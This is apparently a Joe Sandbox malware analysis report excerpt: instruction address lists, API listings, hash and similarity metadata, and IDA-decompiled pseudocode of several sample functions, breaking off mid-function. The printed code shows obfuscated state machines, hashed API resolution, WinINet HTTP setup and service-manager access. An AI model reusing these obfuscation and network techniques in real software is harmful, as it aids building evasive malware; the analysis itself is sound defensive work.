0x02272e64
0x02272e6a
0x00000000
0x02272e70
0x02272c98
0x02272c9a
0x02272ca4
0x02272ca6
0x02272ca6
0x02272c9c
0x02272c9c
0x02272c9f
0x02272c9f
0x02272caf
0x02272cc7
0x02272cc7
0x02272cd5
0x02272cdb
0x02272ce3
0x02272c5a
0x02272c5a
0x02272c5a
0x02272c60
0x02272c60
0x02272c60
0x02272c66
0x00000000
0x00000000
0x00000000
0x02272c66
0x00000000
0x02272c60
0x02272c5a
0x02272c92
0x02272c86
0x02272c7e
0x02272c78
0x02273032
0x0227303d
0x00000000
0x02272e75
0x02272e75
0x02272e7b
0x02272f94
0x02272f9a
0x02272ffe
0x00000000
0x02272f9c
0x02272f9c
0x02272fa2
0x00000000
0x02272fa8
0x02272fad
0x02272faf
0x02272fc7
0x02272fc7
0x02272fe2
0x02272fe4
0x02272feb
0x02272fed
0x02272ff6
0x00000000
0x02272ff6
0x02272fa2
0x02272e81
0x02272e81
0x02272f34
0x02272f39
0x02272f41
0x02272f43
0x02272f56
0x02272f5b
0x02272f5b
0x02272f72
0x02272f74
0x02272f76
0x00000000
0x02272f7c
0x02272f7c
0x02272f84
0x00000000
0x02272f8a
0x02272f8a
0x00000000
0x02272f8a
0x02272f84
0x00000000
0x02272e87
0x02272e87
0x02272e8d
0x02272f03
0x02272f08
0x02272f0a
0x02272f1d
0x02272f22
0x02272f22
0x02272f28
0x02272f2a
0x00000000
0x02272e8f
0x02272e8f
0x02272e95
0x00000000
0x02272e97
0x02272e9c
0x02272ea9
0x02272eab
0x02272ead
0x02272eaf
0x02272eb4
0x02272eb6
0x02272ec9
0x02272ece
0x02272ece
0x02272edb
0x02272edd
0x02272edf
0x02272ee6
0x02272eeb
0x02272eee
0x02272eee
0x02272ef4
0x02272ef4
0x02272ef9
0x00000000
0x02272ef9
0x02272e95
0x02272e8d
0x02272e81
0x00000000
0x02272e7b
0x02272c60

APIs

HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 02272CD5
InternetCloseHandle.WININET(?), ref: 02272DBE
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02272DFA
ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 02272EDB
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02272FE2

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
String ID:
API String ID: 1741791824-0
Opcode ID: 242b5854ad4a7032566ae32ac915e9901e387c83cceecce777e132cecc74f88f
Instruction ID: 2869421f3be6f6d634546d21f6230eb55cf17e08cfce5925a843db82c1f4880d
Opcode Fuzzy Hash: 242b5854ad4a7032566ae32ac915e9901e387c83cceecce777e132cecc74f88f
Instruction Fuzzy Hash: D2A1C072F2C302DBDB14AAE49C8572F76E6AB84644F011A6DEC55EB358DB709C009BD2

Uniqueness

Uniqueness Score: -1.00%

Function 022730D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E022730D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x227ddd0;
									if(_t85 == 0) {
										_t85 = E02273E80(_t76, E02273F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x227ddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x227e25c;
								if(_t90 == 0) {
									_t90 = E02273E80(_t76, E02273F20(0xbb398380), 0x5b27858b, _t102);
									 *0x227e25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x227dea8;
									if(_t68 == 0) {
										_t68 = E02273E80(_t76, E02273F20(0xbb398380), 0x97f883e, _t102);
										 *0x227dea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x227dcec == 0) {
										 *0x227dcec = E02273E80(_t76, E02273F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E02273D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x022730d2
0x022730d6
0x022730dc
0x022730e1
0x022730e6
0x022730ea
0x022730ea
0x022730f0
0x022730f0
0x022730f0
0x022730f0
0x022730f5
0x00000000
0x00000000
0x022731b1
0x02273226
0x0227322e
0x02273233
0x0227323b
0x02273240
0x02273248
0x0227324d
0x02273255
0x0227325a
0x02273262
0x0227326a
0x0227326f
0x0227327c
0x02273280
0x02273285
0x0227328d
0x02273292
0x0227329f
0x022732a3
0x022732a8
0x00000000
0x022731b3
0x022731b8
0x022731ec
0x022731f4
0x0227320c
0x0227320e
0x0227320e
0x0227321a
0x0227321c
0x022730ea
0x022730ea
0x00000000
0x022730ea
0x022731ba
0x022731bf
0x00000000
0x022731c1
0x022731cc
0x00000000
0x022731cc
0x022731bf
0x022731b8
0x00000000
0x022731b1
0x022730fb
0x0227319c
0x00000000
0x022731a2
0x022731a2
0x00000000
0x022731a2
0x02273101
0x02273106
0x022732b5
0x022732bd
0x022732d5
0x022732d7
0x022732d7
0x022732ee
0x022732f0
0x022732f7
0x022732fd
0x02273300
0x00000000
0x0227310c
0x02273111
0x0227312e
0x02273135
0x02273148
0x0227314d
0x0227314d
0x02273154
0x0227315d
0x02273175
0x02273175
0x02273182
0x02273184
0x02273188
0x02273306
0x0227330d
0x0227318e
0x0227318e
0x00000000
0x0227318e
0x02273113
0x02273118
0x00000000
0x0227311e
0x02273125
0x02273127
0x022730ea
0x022730ea
0x00000000
0x022730ea
0x022730ea
0x02273118
0x02273111
0x02273106
0x00000000
0x022731d4
0x022731d4
0x022731e9
0x00000000
0x022731e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02273182

Strings

&, xrefs: 0227328D
S=, xrefs: 02273226
B, xrefs: 02273262

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: 3de0bc0aa069930e2fe8fa651626b298f834ac3f84be0f221b0eadeee996a580
Instruction ID: c39e9db4d3230ba168f628656b658005be21b42b73c8895fd42cd55cf610a729
Opcode Fuzzy Hash: 3de0bc0aa069930e2fe8fa651626b298f834ac3f84be0f221b0eadeee996a580
Instruction Fuzzy Hash: 0251B372A2C3029BCB18DEA8949852FB7E6FFD4244F10489EF045C7218DB70D9499BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02279C10, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E02279C10(void* __ebp) {
				short _v520;
				short _v1040;
				char _v1044;
				void* __ebx;
				void* _t7;
				intOrPtr* _t9;
				intOrPtr* _t43;
				void* _t46;
				void* _t49;

				_t46 = __ebp;
				_t7 = 0x2c176d24;
				goto L1;
				do {
					while(1) {
						L1:
						_t49 = _t7 - 0x2c176d24;
						if(_t49 > 0) {
							break;
						}
						if(_t49 == 0) {
							_t7 = 0x2ca09120;
							continue;
						} else {
							if(_t7 == 0x17e35087) {
								_v1044 = 0x104;
								if( *0x227ded0 == 0) {
									 *0x227ded0 = E02273E80(0, E02273F20(0xbb398380), 0x23563937, _t46);
								}
								_t43 =  *0x227df2c;
								if(_t43 == 0) {
									_t43 = E02273E80(0, E02273F20(0xbb398380), 0xd0ee7032, _t46);
									 *0x227df2c = _t43;
								}
								 *_t43(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
								_t7 = 0x2c13ef60;
								continue;
							} else {
								if(_t7 == 0x2c13ef60) {
									if( *0x227dd80 == 0) {
										 *0x227dd80 = E02273E80(0, E02273F20(0xbb398380), 0xcb2f8494, _t46);
									}
									lstrcmpiW( &_v520,  &_v1040); // executed
									_t26 =  !=  ? 1 : 0;
									_t22 =  !=  ? 1 : 0;
									return  !=  ? 1 : 0;
								} else {
									goto L5;
								}
							}
						}
						L20:
					}
					if(_t7 != 0x2ca09120) {
						goto L5;
					} else {
						_t9 =  *0x227de58;
						if(_t9 == 0) {
							_t9 = E02273E80(0, E02273F20(0xbb398380), 0xb1aefb5, _t46);
							 *0x227de58 = _t9;
						}
						 *_t9(0,  &_v520, 0x104);
						_t7 = 0x17e35087;
						goto L1;
					}
					goto L20;
					L5:
				} while (_t7 != 0x3e45350);
				return 0;
				goto L20;
			}

0x02279c10
0x02279c16
0x02279c1e
0x02279c20
0x02279c20
0x02279c20
0x02279c20
0x02279c25
0x00000000
0x00000000
0x02279c2b
0x02279cc9
0x00000000
0x02279c31
0x02279c36
0x02279c5c
0x02279c66
0x02279c80
0x02279c80
0x02279c86
0x02279c8e
0x02279ca6
0x02279ca8
0x02279ca8
0x02279cbd
0x02279cbf
0x00000000
0x02279c38
0x02279c3d
0x02279d24
0x02279d3c
0x02279d3c
0x02279d4e
0x02279d58
0x02279d5c
0x02279d65
0x00000000
0x00000000
0x00000000
0x02279c3d
0x02279c36
0x00000000
0x02279c2b
0x02279cd8
0x00000000
0x02279cde
0x02279cde
0x02279ce5
0x02279cf8
0x02279cfd
0x02279cfd
0x02279d11
0x02279d13
0x00000000
0x02279d13
0x00000000
0x02279c43
0x02279c43
0x02279c55
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 02279CBA
QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02279CBD
lstrcmpiW.KERNELBASE(?,?), ref: 02279D4E

Strings

79V#, xrefs: 02279C72

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: Process$CurrentFullImageNameQuerylstrcmpi
String ID: 79V#
API String ID: 3605714105-696535739
Opcode ID: 0e709b48fa2672d7679fce795c5c95366dce201e1cdf672a1c9e9b149f4395c0
Instruction ID: 49a44879c00cd3996da0c2181877e6e183ea5a996bdfe8ea78d1185ca45c005e
Opcode Fuzzy Hash: 0e709b48fa2672d7679fce795c5c95366dce201e1cdf672a1c9e9b149f4395c0
Instruction Fuzzy Hash: C831FC76B6C3049BDB24EBF4B49576B22D6ABC4694F14085EF441CB248DB70DC48CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00425FF1() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x439be0;
				_t18 = GetVersion();
				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x00439C38 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x00439C3C = _t19;
				 *0x00439C40 = _t40 - _t19;
				 *0x00439C44 = _t19;
				 *0x00439C48 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
				}
				E004171BC(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E00417178(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

APIs

GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
LoadCursorA.USER32 ref: 004260D3
LoadCursorA.USER32 ref: 004260DE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004080E7, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004080E7() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x43b634; // 0x1
				_t26 =  *0x43b624; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x43b638; // 0x22d05a8
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x43b634 =  *0x43b634 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x43b624 =  *0x43b624 + 0x10;
				 *0x43b638 = _t25;
				_t15 =  *0x43b634; // 0x1
				goto L3;
			}

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89

Uniqueness

Uniqueness Score: -1.00%

Function 022796B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E022796B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t71;
				void* _t73;
				intOrPtr _t79;
				void* _t87;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E02277AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x227ddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E02273E80(_t79, E02273F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x227ddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x227de58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02273E80(_t79, E02273F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x227de58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										_t71 = E02273D10( &_v536);
										_t87 =  *0x227e2ec; // 0x4d9470
										 *((intOrPtr*)(_t87 + 0x48)) = _t71;
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x227df38; // 0x75243620
											if(_t90 == 0) {
												_t90 = E02273E80(_t79, E02273F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x227df38 = _t90;
											}
											_t73 =  *0x227e2ec; // 0x4d9470
											 *_t90(0, _v528, 0, 0, _t73 + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x227e0f4;
							if( *0x227e0f4 == 0) {
								 *0x227e0f4 = E02273E80(_t79, E02273F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								_t48 =  *0x227e2ec; // 0x4d9470
								 *((intOrPtr*)(_t48 + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x227df38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E02273E80(_t79, E02273F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x227df38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524);
							_t53 =  *0x227e2ec; // 0x4d9470
							__eflags = _t53 + 0x10;
							E02273070(_t53 + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								_t61 =  *0x227e2ec; // 0x4d9470
								 *((intOrPtr*)(_t61 + 0x3c)) = 0x2277c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E022742F0(_t79, 0x480);
									 *0x227e2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E02277C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x022796b8
0x022796bc
0x022796c2
0x022796c4
0x022796c4
0x022796c7
0x022796d0
0x022796d0
0x022796d0
0x022796d0
0x022796d5
0x00000000
0x00000000
0x022796db
0x022797e7
0x022797f4
0x022797fc
0x02279801
0x02279809
0x0227980f
0x0227981d
0x02279821
0x02279826
0x00000000
0x022796e1
0x022796e1
0x022796e6
0x022797cd
0x022797d2
0x00000000
0x022797d8
0x022797d8
0x022797dd
0x00000000
0x022797dd
0x022796ec
0x022796ec
0x0227979c
0x022797a1
0x022797a3
0x022797b6
0x022797bb
0x022797bb
0x022797c1
0x022797c3
0x00000000
0x022796f2
0x022796f7
0x0227974e
0x02279753
0x02279755
0x02279768
0x0227976d
0x0227976d
0x0227977e
0x02279784
0x02279789
0x0227978f
0x02279792
0x00000000
0x022796f9
0x022796fe
0x00000000
0x02279704
0x02279704
0x0227970c
0x02279724
0x02279726
0x02279726
0x0227972c
0x02279740
0x02279744
0x02279749
0x00000000
0x02279749
0x022796fe
0x022796f7
0x022796ec
0x022796e6
0x00000000
0x022796db
0x02279833
0x02279838
0x022798d6
0x022798db
0x00000000
0x022798dd
0x022798e2
0x022798e4
0x022798fc
0x022798fc
0x0227990a
0x0227990c
0x0227990e
0x02279910
0x02279927
0x02279912
0x02279912
0x02279917
0x0227991d
0x0227991d
0x00000000
0x02279910
0x0227983e
0x0227983e
0x02279948
0x0227994d
0x0227994f
0x02279962
0x02279967
0x02279967
0x02279979
0x0227997b
0x02279984
0x02279988
0x00000000
0x02279844
0x02279844
0x02279849
0x0227987e
0x0227988b
0x0227989f
0x022798a2
0x022798af
0x022798b3
0x022798b8
0x022798c0
0x022798c5
0x022798cc
0x00000000
0x0227984b
0x0227984b
0x02279850
0x00000000
0x02279856
0x0227985b
0x02279860
0x02279865
0x02279867
0x02279990
0x0227999b
0x0227986d
0x0227986d
0x02279874
0x00000000
0x02279874
0x02279867
0x02279850
0x02279849
0x0227983e
0x00000000
0x02279931
0x02279931
0x02279931
0x02279947
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 0227990A

Strings

6$u, xrefs: 02279704, 02279726, 02279967
I?, xrefs: 02279826

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: 6$u$I?
API String ID: 1889721586-3653535747
Opcode ID: 5cdf0d28f381992c3cc55da6a7b426ba034306667e0c93ae23e55174c1049429
Instruction ID: e05f5455cf6ff810fb1d32c99633985c12d4a5992b8a77a43b21cd5b239a4732
Opcode Fuzzy Hash: 5cdf0d28f381992c3cc55da6a7b426ba034306667e0c93ae23e55174c1049429
Instruction Fuzzy Hash: E261E57172C3019FDB28EEE9948972F73A5AB80314F40891DE556CB398DB74D844CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022799A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E022799A0() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				intOrPtr* _t12;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr* _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t38;
				intOrPtr _t41;
				void* _t45;
				intOrPtr* _t59;
				intOrPtr _t63;
				void* _t79;
				void* _t80;
				void* _t82;

				_t79 = _v528;
				_t11 = 0x1e395e13;
				while(1) {
					_t82 = _t11 - 0x1f18c325;
					if(_t82 > 0) {
						goto L24;
					}
